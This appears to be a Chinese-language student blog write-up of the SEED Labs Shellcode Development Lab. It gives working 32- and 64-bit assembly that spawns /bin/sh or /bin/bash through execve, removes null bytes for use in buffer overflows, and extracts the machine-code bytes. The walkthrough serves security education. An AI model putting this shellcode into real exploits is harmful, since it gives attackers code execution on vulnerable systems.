Shellcode Development Lab

前言

SEED Labs是雪城大学杜文亮教授开设的安全相关的实验，通过一些样例学习安全知识，因为对于漏洞利用不太熟悉，所以决定通过这些实验来进行入门练习。

SEED Labs 主页：https://seedsecuritylabs.org/index.html

SEED Labs 2.0 Software Security Labs：https://seedsecuritylabs.org/Labs_20.04/Software/

环境搭建

官方的网页：https://seedsecuritylabs.org/labsetup.html 提供了两种方法，虚拟机和云服务器

虚拟机提供的是VirtualBox预安装好的镜像，同时有manual指导安装

云服务器安装支持AWS，Google Cloud，Azure，DigitalOcean和阿里云，也有manual指导安装：https://github.com/seed-labs/seed-labs/blob/master/manuals/cloud/seedvm-cloud.md

细节在这里不赘述，我使用的是虚拟机环境。

Shellcode Development Lab

本节实验的主要任务是帮助我们理解shellcode的原理，以及在实战中编写shellcode需要注意的点。

Tasks：https://seedsecuritylabs.org/Labs_20.04/Files/Shellcode/Shellcode.pdf
Lab setup files：https://seedsecuritylabs.org/Labs_20.04/Files/Shellcode/Labsetup.zip

Task 1: Writing Shellcode

shellcode通常用汇编编写，形式主要取决于架构，通常是Intel架构，分为32位(x86)和64位(x64)，现在的计算机多数是64位架构，但也可以运行32位程序。

Task 1.a: The Entire Process

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax 
      push eax          ; Use 0 to terminate the string
      push "//sh"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points "/bin//sh"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

这是实验提供的shellcode样例程序，执行后可以调用shell

用nasm将该汇编代码编译为.o目标文件

1	$ nasm -f elf32 mysh.s -o mysh.o

需要用ld链接目标文件才能产生可执行文件

1	$ ld -m elf_i386 mysh.o -o mysh

可以用echo $$打印当前shell的ID以验证mysh程序调用了一个新的shell

在攻击的时候，我们只需要注入攻击代码的机器码，而不是一个完整的可执行文件，攻击代码的机器码就叫做shellcode，这里我们可以直接从mysh.o中获取，调用objdump反汇编

1	$ objdump -Mintel --disassemble mysh.o

可以看到shellcode以及对应的汇编指令

mysh.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	31 c0                	xor    eax,eax
   2:	50                   	push   eax
   3:	68 2f 2f 73 68       	push   0x68732f2f
   8:	68 2f 62 69 6e       	push   0x6e69622f
   d:	89 e3                	mov    ebx,esp
   f:	50                   	push   eax
  10:	53                   	push   ebx
  11:	89 e1                	mov    ecx,esp
  13:	31 d2                	xor    edx,edx
  15:	31 c0                	xor    eax,eax
  17:	b0 0b                	mov    al,0xb
  19:	cd 80                	int    0x80

这样不方便复制，可以用xxd用十六进制格式打印文件的内容

1	$ xxd -p -c 20 mysh.o

-p选项是以plain hexdump格式打印，-c 20是以每行20个输出

7f454c4601010100000000000000000001000300
0100000000000000000000004000000000000000
3400000000002800050002000000000000000000
0000000000000000000000000000000000000000
0000000000000000000000000000000000000000
0000000001000000010000000600000000000000
100100001b000000000000000000000010000000
0000000007000000030000000000000000000000
3001000021000000000000000000000001000000
0000000011000000020000000000000000000000
6001000040000000040000000300000004000000
1000000019000000030000000000000000000000
a00100000f000000000000000000000001000000
00000000000000000000000031c050682f2f7368
682f62696e89e3505389e131d231c0b00bcd8000
00000000002e74657874002e7368737472746162
002e73796d746162002e73747274616200000000
0000000000000000000000000000000000000000
0000000000000000010000000000000000000000
0400f1ff00000000000000000000000003000100
08000000000000000000000010000100006d7973
682e73005f73746172740000

根据objdump的结果显示，shellcode以31 c0开头，cd 80结尾，直接复制这一段即可

1 2	31c050682f2f7368 682f62696e89e3505389e131d231c0b00bcd80

实验还提供一个python脚本convert.py，帮助我们将shellcode转换为python中合适的格式。

Task 1.b. Eliminating Zeros from the Code

shellcode通常用在buffer overflow漏洞攻击中，通常因为一些字符串或者内存copy导致溢出，但是在一些字符串copy函数中，0表示字符串的结束，所以如果shellcode中存在0，则会被截断，0后面的shellcode不会被copy，导致shellcode不完整。

所以shellcode中需要避免0的出现，但是一些情况下必须要用到0的时候，则想一些替代的指令来绕过0的出现。例如

对寄存器赋值0，mov eax, 0，则可以用xor eax, eax替代
一些常数中包含0，例如对寄存器赋值，mov eax, 0x99，看上去没有0，但eax是32位寄存器，0x99会高位补0，变为0x00000099。这种情况，可以先将eax置为0，再对al赋值0x99，al是8位的寄存器，不会有高位补0的情况。
或者利用移位，例如参数为"xyz"，转换为整数为0x007A7978，高位有0，但是可以在赋值的时候赋值为"xyz#"，然后利用移位置0
1
2
3
mov ebx, "xyz#"
shl ebx, 8
shr ebx, 8
先左移8位，去掉#，然后再右移8位，补上0

任务：shellcode中，push的字符串是"/bin//sh"，本应该是"/bin/sh"，但是因为在32位程序中，需要4byte对齐，所以将/sh改为//sh。任务要求使用/bin/bash，不允许添加多余的/进行调用，且shellcode中不允许出现0。

按照倒序对/bin/bash和4 bytes对齐进行入栈，则顺序为h，/bas，/bin，最后的h显然不够4 bytes，高位会补0，但我们不希望出现0，所以直接对al赋值即可。

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax
      push eax          ; Use 0 to terminate the string
      xor eax, eax
      mov al, "h"
      push eax
      xor eax, eax
      push "/bas"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points "/bin//sh"
      mov  ecx, esp     ; Get the address of argv[]

      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

Task 1.c. Providing Arguments for System Calls

从C语言看，execve函数的原型为int execve(const char *filename, char *const argv[], char *const envp[]);

第一个参数filename是字符串代表的文件路径。第二个参数argv[]是数组指针，数组中每个元素是一个指针，指向一个参数，且最后一个元素为NULL，表示数组结束。最后一个参数envp[]是传递给执行文件的新环境变量数组。

任务：调用execve执行以下命令

1	/bin/sh -c "ls -la"

所以需要构造参数数组为

argv[3] = 0
argv[2] = "ls -a"
argv[1] = "-c"
argv[0] = "/bin/sh"

代码如下

section .text
  global _start
    _start:
      ; Store the argument string on stack
   
      xor eax, eax
      mov ax, "la"
      push eax
      push "ls -"
      mov edx, esp

      xor eax, eax
      mov ax, "-c"
      push eax
      mov ecx, esp

      xor eax, eax
      push eax
      push "//sh"
      push "/bin"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[3] = 0
      push edx          ; argv[2] points "ls -la"
      push ecx          ; argv[1] points "-c"
      push ebx          ; argv[0] points "/bin//sh"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; For environment variable 
      xor  edx, edx     ; No env variables 

      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

这里的”-c”和”la”都是16位，所以直接对16位寄存器ax赋值即可。

Task 1.d. Providing Environment Variables for `execve()`

上面提到execve()的第三个参数是环境变量，本节的任务是传递一些环境变量给execve()

任务：执行/usr/bin/env，并打印以下环境变量

$ ./myenv
aaa=1234
bbb=5678
cccc=1234

首先需要构建env[]数组，每个元素为指向环境变量的指针，每个环境变量的形式是name=value形式的字符串，字符串的结尾是0，env[]数组的最后一个元素为0。

env[3] = 0
env[2] = address to the "cccc=1234" string
env[1] = address to the "bbb=5678" string
env[0] = address to the "aaa=1234" string

代码如下

section .text
  global _start
    _start:
      ; Store the argument string on stack
      xor  eax, eax 
      push eax          ; Use 0 to terminate the string
      xor eax, eax
      mov al, "4"
      push eax
      push "=123"
      push "cccc"
      mov ebx, esp

      xor eax, eax
      push eax
      push "5678"
      push "bbb="
      mov edx, esp
     
      push eax
      push "1234"
      push "aaa="
      mov ecx, esp

      ; For environment variable 
      push eax
      push ebx
      push edx
      push ecx
      mov edx, esp

      push eax
      push "/env"
      push "/bin"
      push "/usr"
      mov  ebx, esp     ; Get the string address

      ; Construct the argument array argv[]
      push eax          ; argv[1] = 0
      push ebx          ; argv[0] points "/usr/bin/env"
      mov  ecx, esp     ; Get the address of argv[]
   
      ; Invoke execve()
      xor  eax, eax     ; eax = 0x00000000
      mov   al, 0x0b    ; eax = 0x0000000b
      int 0x80

Task 2: Using Code Segment

Task 1中的数据都是在栈上动态构造数据结构，所以数据地址都依赖于esp。

还有一种解决数据地址问题的方法，即将数据存储在代码区域，地址通过函数调用机制获取

section .text
  global _start
    _start:
	BITS 32 ;代码是32位对齐的
	jmp short two ;跳转到two label的地方执行
    one:
 	pop ebx ;将栈顶数据出栈存入ebx，此时ebx中的数据是db处的地址
 	xor eax, eax ;置eax为0
 	mov [ebx+7], al ;将ebx+7地址处的1 byte数据置为0，即*->0
 	mov [ebx+8], ebx ;将ebx+8地址处4 bytes数据改为ebx，即AAAA->data address
 	mov [ebx+12], eax ;将ebx+12地址处4 byte数据置为0，即BBBB->0000
 	lea ecx, [ebx+8] ;将ebx+8处的地址存入ecx，即data address(AAAA)的首地址
 	xor edx, edx ;置edx为0
 	
 	; invoke execve()
 	mov al,  0x0b 
 	int 0x80
     two:
 	call one ;调用one label的函数，将下一条指令入栈再跳转one执行
 	db '/bin/sh*AAAABBBB' ;db为定义单位为byte的数据

注释中解释了代码中每一条指令的含义

在链接时，因为数据定义在代码段，需要加上-omagic选项，这样代码段才能进行写操作。

1 2	$ nasm -f elf32 mysh2.s -o mysh2.o $ ld --omagic -m elf_i386 mysh2.o -o mysh2

任务：用上述样例代码中的方式，执行/usr/bin/env，打印如下环境变量

1
2

a=11
b=22

首先，我们需要构造三个参数

1
2
3

filename = "/usr/bin/env"
argv[] = {"/usr/bin/env", NULL}
env[] = {address to "a=11", address to "b=22", NULL}

按照mysh2.s的方式，定义数据应该为db '/usr/bin/env*NNNNDDDDa=11*b=22*AAAABBBBNNNN'

*代表后续应该用1 byte的0替代的位置，表示字符串的结尾。NNNN表示4 bytes的0需要替代的位置，表示数组中的NULL，AAAA和BBBB分别表示a=11和b=22的地址。

代码如下

section .text
  global _start
    _start:
	BITS 32
	jmp short two
    one:
 	pop ebx ;command address
 	xor eax, eax
 	mov [ebx+12], al ;string 0 terminal
	mov [ebx+13], ebx

	mov [ebx+17], eax ;argv[1] = 0
	lea ecx, [ebx+13] ;argv[]

  	mov [ebx+25], al
 	mov [ebx+30], al
	lea edx, [ebx+21] ;points 'a=11'
	mov [ebx+31], edx
	lea edx, [ebx+26] ;points 'b=22'
	mov [ebx+35], edx
	mov [ebx+39], eax
	lea edx, [ebx+31]

 	;xor edx, edx
	;lea edx, [ebx+13]
 	mov al,  0x0b
 	int 0x80
     two:
 	call one
	;   0   4   8   23   7   1   56   01   5   9
 	db '/usr/bin/env*NNNNDDDDa=11*b=22*AAAABBBBNNNN'

Task 3: Writing 64-bit Shellcode

64位和32位的shellcode不同点主要有两个：1）64位的地址是8 byte，且寄存器也变成了64bit的寄存器。2）系统调用是通过syscall进行的，前三个参数按顺序放在rdi，rsi，rdx中

section .text
  global _start
    _start:
      ; The following code calls execve("/bin/sh", ...)
      xor  rdx, rdx       ; 3rd argument
      push rdx
      mov rax,'/bin//sh'
      push rax
      mov rdi, rsp        ; 1st argument
      push rdx 
      push rdi
      mov rsi, rsp        ; 2nd argument
      xor  rax, rax
      mov al, 0x3b        ; execve()
      syscall

编译的命令也要改为64位的参数

1 2	$ nasm -f elf64 mysh_64.s -o mysh_64.o $ ld mysh_64.o -o mysh_64

任务：类似Task 1.b，在64位的shellcode上调用/bin/bash，且不允许冗余/和0出现在shellcode中。

section .text
  global _start
    _start:
      ; The following code calls execve("/bin/sh", ...)
      xor  rdx, rdx       ; 3rd argument
      mov al, 'h'
      push rax,
      mov rax, '/bin/bas'
      push rax
      mov rdi, rsp        ; 1st argument
      
      push rdx 
      push rdi
      mov rsi, rsp        ; 2nd argument
      xor  rax, rax
      mov al, 0x3b        ; execve()
      syscall

zinc's blog

SEED Labs 2.0 Software Security Lab 1

Shellcode Development Lab

前言

环境搭建

Shellcode Development Lab

Task 1: Writing Shellcode

Task 1.a: The Entire Process

Task 1.b. Eliminating Zeros from the Code

Task 1.c. Providing Arguments for System Calls

Task 1.d. Providing Environment Variables for `execve()`

Task 2: Using Code Segment

Task 3: Writing 64-bit Shellcode

Shellcode Development Lab

前言

环境搭建

Shellcode Development Lab

Task 1: Writing Shellcode

Task 1.a: The Entire Process

Task 1.b. Eliminating Zeros from the Code

Task 1.c. Providing Arguments for System Calls

Task 1.d. Providing Environment Variables for execve()

Task 2: Using Code Segment

Task 3: Writing 64-bit Shellcode

Task 1.d. Providing Environment Variables for `execve()`